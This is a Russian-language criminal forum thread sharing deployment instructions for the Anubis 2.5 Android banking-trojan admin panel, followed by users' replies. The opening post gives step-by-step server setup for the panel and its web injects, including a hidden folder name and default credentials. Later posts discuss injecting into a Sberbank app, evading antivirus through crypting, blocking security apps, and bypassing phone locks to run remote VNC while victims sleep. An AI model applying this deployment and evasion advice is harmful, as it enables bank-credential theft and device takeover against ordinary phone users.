ANUBIS 2.5 without request turn off Google Play Protec

Quick Reply

spamerz

Пользователь
Пользователь

spamerz

Пользователь
Пользователь

Ofline
Инструкция по установке админки.
Посмотреть вложение 11

Linux Centos, Debian, Ubuntu, php 7 +( mysql не ниже 5.5)

---Русский---

1) Распаковать админ панель в корневом каталоге сервера Apache(/var/www/html/);

2) Загрузить базу данных на сервер mysql;

3) Изменить имя папки "anubis", к примеру "asdfgh35546fhwJYGvdfgsadsg";

4) Прописываем конфигурации подключения к базе данных,
/private/config.php,
/asdfgh35546fhwJYGvdfgsadsg/config.php,
там же указываем в config.php нашу папку:
"define('namefolder', 'asdfgh35546fhwJYGvdfgsadsg');";

5) Открываем доступ к папкам:
chmod 777asdfgh35546fhwJYGvdfgsadsg/application/datalogs/logs
chmod 777 asdfgh35546fhwJYGvdfgsadsg/application/datalogs/numers
chmod 777 asdfgh35546fhwJYGvdfgsadsg/application/datalogs/files
chmod 777asdfgh35546fhwJYGvdfgsadsg/application/websocket/VNC
chmod 777 asdfgh35546fhwJYGvdfgsadsg/application/websocket/sound

6)Указываем URL админ панели инжектам, так же инжекты можно размещать отдельно от админ панели!
/inj/config.php

$URL= "http://URL_ADMIN_PANEL.COM";

7) Переименовываем файлы dd.htaccess на .htaccess ("/", "/application/(file, logs,numers), /application/websocket/(sound,VNC)")

😎 Открываем url:http://URL_ADMIN_PANEL.COM/asdfgh35546fhwJYGvdfgsadsg
Login: admin
Password: admin

---English---

1) Unpack the admin panel in the root directory of the Apache server(/var/www/html/);

2) Upload database to mysql server;

3) Change the folder name "anubis", for example "asdfgh35546fhwJYGvdfgsadsg";

4) Prescribe the configuration of the database connection,
/private/config.php,
/asdfgh35546fhwJYGvdfgsadsg/config.php,
there's also specified in the config.php our folder:
"define ('namefolder', 'asdfgh35546fhwJYGvdfgsadsg');";

5) Open access to folders:
chmod 777asdfgh35546fhwJYGvdfgsadsg/application/data logs/logs
chmod 777 asdfgh35546fhwJYGvdfgsadsg/application/data logs/numbers
chmod 777 asdfgh35546fhwJYGvdfgsadsg/application/data logs/files
chmod 777 asdfgh35546fhwJYGvdfgsadsg/application/websocket/VNC
chmod 777asdfgh35546fhwJYGvdfgsadsg/application/websocket/sound

6) Specify URL admin panel injection, as the injectors can be installed separately from the injectors admin panel!
/inj/config.php

$URL= "http://URL_ADMIN_PANEL.COM";

7) Edit files name dd.htaccess to .htaccess ("/", "/application/(file, logs, numers), /application/websocket/(sound, VNC)")

😎 Open url:http://URL_ADMIN_PANEL.COM/asdfgh35546fhwJYGvdfgsadsg
Login: admin
Password: admin

А вот инструкция от автора в картинках и видео

*** Hidden text: cannot be quoted. ***
I take it you have checked this for gluing?

carthief77

Пользователь
Пользователь

carthief77

Пользователь
Пользователь

Ofline
Работает, качайте, но боты дохнут, наверное потому что нет крипта лол, ну и вот я добавил инжект на сбер допустим, проверить просто, ну и крч он запустил сбер и антивирь сбера убил бота лол!

Вложения

• Screen Shot 2021-01-06 at 23.16.18.png
    Screen Shot 2021-01-06 at 23.16.18.png
    35,1 КБ · Просмотры: 7

Drop

Пользователь
Пользователь

Drop

Пользователь
Пользователь

Ofline
Работает, качайте, но боты дохнут, наверное потому что нет крипта лол, ну и вот я добавил инжект на сбер допустим, проверить просто, ну и крч он запустил сбер и антивирь сбера убил бота лол!
Прежде чем запускать инжект, есть такая функция удалить приложение, удали его, а потом инжект и будет тебе счастье)

carthief77

Пользователь
Пользователь

carthief77

Пользователь
Пользователь

Ofline
Прежде чем запускать инжект, есть такая функция удалить приложение, удали его, а потом инжект и будет тебе счастье)
В этом такой функции нет, это наверное потом добавили, или я плохо смотрел.

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
ГЛАВНЫЙ АДМИН
Админ

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
ГЛАВНЫЙ АДМИН
Админ

Дохнут по причине того, что все команды держит в памяти а не файлах да и ав быстро палить начинают админку по файлам команд и инжектам. Тут даже хороший крипт не спасет т.к. система оптимизации в сон отправляет

carthief77

Пользователь
Пользователь

carthief77

Пользователь
Пользователь

Ofline
Дохнут по причине того, что все команды держит в памяти а не файлах да и ав быстро палить начинают админку по файлам команд и инжектам. Тут даже хороший крипт не спасет т.к. система оптимизации в сон отправляет
Если допустим отключен гугл протект то бот живет хоть вечность, я проверял, все ок, если включить даже если с криптом то умрет? На древних то убогих андроидах полюбому не умрет, там же старые обновления безопасности, у меня нектр боты не умирали пока не заходили в сбер допустим и там вроде каcпер встроенный и он их убивал, как то так, или они в любом случае умрут?

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
ГЛАВНЫЙ АДМИН
Админ

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
ГЛАВНЫЙ АДМИН
Админ

Если допустим отключен гугл протект то бот живет хоть вечность, я проверял, все ок, если включить даже если с криптом то умрет? На древних то убогих андроидах полюбому не умрет, там же старые обновления безопасности, у меня нектр боты не умирали пока не заходили в сбер допустим и там вроде каcпер встроенный и он их убивал, как то так, или они в любом случае умрут?
Протект вообще роли не играет, если его даже отключаешь, раз в сутки Гугл сканирует файлы и отправляет стату. Поэтому в приват ботах вообще не ставят эту функцию как отключение ГП. Это в паблик ботах только говно стоит, как бы маркетинг ход, чтобы лохов больше покупали или брали в аренду. Да как и многие другие функции, типа внц, от которого толку нет. Надо вначале в ботах реализовать нормально чтобы будить телефон и обходить пин код, пароль, графический ключ, чтобы включать внц пока юзер спит.
В нормальных ботах просто ставят список на лок приложений (ав, оптимизаторы всякие)
А вот если использовать свой крипт или у того же Голда брать не паблик а приват подписку за 400$, то крипт и месяц на любом давайте держатся будет без детекта.